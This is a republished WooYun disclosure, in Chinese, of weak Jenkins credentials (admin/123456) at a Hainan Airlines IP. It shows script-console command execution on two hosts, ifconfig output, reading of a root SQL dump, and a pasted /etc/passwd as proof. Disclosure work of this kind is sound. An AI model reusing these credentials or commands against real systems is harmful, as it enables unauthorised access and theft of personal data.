海南航空某系统弱口令导致两台主机命令执行

admin 2017年5月1日06:42:04评论337 views字数 222阅读0分44秒阅读模式
摘要

2016-06-02: 细节已通知厂商并且等待厂商处理中
2016-06-02: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-07: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(6) 关注此漏洞

缺陷编号: WooYun-2016-215425

漏洞标题: 海南航空某系统弱口令导致两台主机命令执行

相关厂商: hnair.com

漏洞作者: 路人甲

提交时间: 2016-06-02 13:07

公开时间: 2016-06-07 14:30

漏洞类型: 命令执行

危害等级: 高

自评Rank: 13

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程命令执行 弱口令

1人收藏


漏洞详情

披露状态:

2016-06-02: 细节已通知厂商并且等待厂商处理中
2016-06-02: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

6月份例行打卡.

详细说明:

http://111.202.107.86:8080/

弱口令 admin 123456

海南航空某系统弱口令导致两台主机命令执行

http://111.202.107.86:8080/user/gang.hu/configure

海南航空某系统弱口令导致两台主机命令执行

http://111.202.107.86:8080/user/wangze/configure

海南航空某系统弱口令导致两台主机命令执行

两台终端命令执行

第一处 http://111.202.107.86:8080/computer/(master)/script

ifconfig -a

code 区域
em1       Link encap:Ethernet  HWaddr 54:9F:35:10:D7:34  
inet addr:111.202.107.86 Bcast:111.202.107.87 Mask:255.255.255.248
inet6 addr: fe80::569f:35ff:fe10:d734/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5470859 errors:0 dropped:0 overruns:0 frame:0
TX packets:5268871 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2385907701 (2.2 GiB) TX bytes:1189720238 (1.1 GiB)
Interrupt:35

em2 Link encap:Ethernet HWaddr 54:9F:35:10:D7:35
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:38

em3 Link encap:Ethernet HWaddr 54:9F:35:10:D7:36
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:34

em4 Link encap:Ethernet HWaddr 54:9F:35:10:D7:37
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:36

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:33300 errors:0 dropped:0 overruns:0 frame:0
TX packets:33300 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2280784 (2.1 MiB) TX bytes:2280784 (2.1 MiB)

第二处 http://111.202.107.86:8080/computer/slave/script

code 区域
em1       Link encap:Ethernet  HWaddr B0:83:FE:DF:3F:0A  
inet addr:111.202.107.85 Bcast:111.202.107.87 Mask:255.255.255.248
inet6 addr: fe80::b283:feff:fedf:3f0a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4932487 errors:0 dropped:0 overruns:0 frame:0
TX packets:4832674 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1930307007 (1.7 GiB) TX bytes:1592031438 (1.4 GiB)
Interrupt:35

em2 Link encap:Ethernet HWaddr B0:83:FE:DF:3F:0B
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:38

em3 Link encap:Ethernet HWaddr B0:83:FE:DF:3F:0C
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:34

em4 Link encap:Ethernet HWaddr B0:83:FE:DF:3F:0D
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:36

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:131027 errors:0 dropped:0 overruns:0 frame:0
TX packets:131027 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:106172131 (101.2 MiB) TX bytes:106172131 (101.2 MiB)

命令执行的就是这两台服务器

海南航空某系统弱口令导致两台主机命令执行

第二处 还是root权限

海南航空某系统弱口令导致两台主机命令执行

-rw-r--r--. 1 root root 4589636 8月 27 2015 /root/cc_haihang.sql

cat /root/cc_haihang.sql

mask 区域
*****admin` *****
*****`admin` DIS*****
*****9C9C93','','15810985173','客服',18,2147483647,1439174061,NULL,'1'),(36,'opera*****
*****`admin` ENA*****
*****TABL*****

海南航空某系统弱口令导致两台主机命令执行

漏洞证明:

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin

rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin

avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin

abrt:x:173:173::/etc/abrt:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

gdm:x:42:42::/var/lib/gdm:/sbin/nologin

ntp:x:38:38::/etc/ntp:/sbin/nologin

apache:x:48:48:Apache:/var/www:/sbin/nologin

saslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin

postfix:x:89:89::/var/spool/postfix:/sbin/nologin

pulse:x:497:496:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

tcpdump:x:72:72::/:/sbin/nologin

mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash

memcached:x:496:493:Memcached daemon:/var/run/memcached:/sbin/nologin

修复方案:

弱口令

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-07 14:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-06-07 19:17 | 欧尼酱 ( 路人 | Rank:15 漏洞数:7 | 技术马马虎虎)

    0

    然后修复了

  2. 2016-06-07 19:31 | j14n ( 普通白帽子 | Rank:2226 漏洞数:401 )

    0

    @欧尼酱 木有

  3. 2016-06-08 16:46 | 欧尼酱 ( 路人 | Rank:15 漏洞数:7 | 技术马马虎虎)

    0

    @j14n 我试着登陆Jenkins没登录进去。

  4. 2016-06-08 16:48 | j14n ( 普通白帽子 | Rank:2226 漏洞数:401 )

    0

    @欧尼酱 那就对了。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin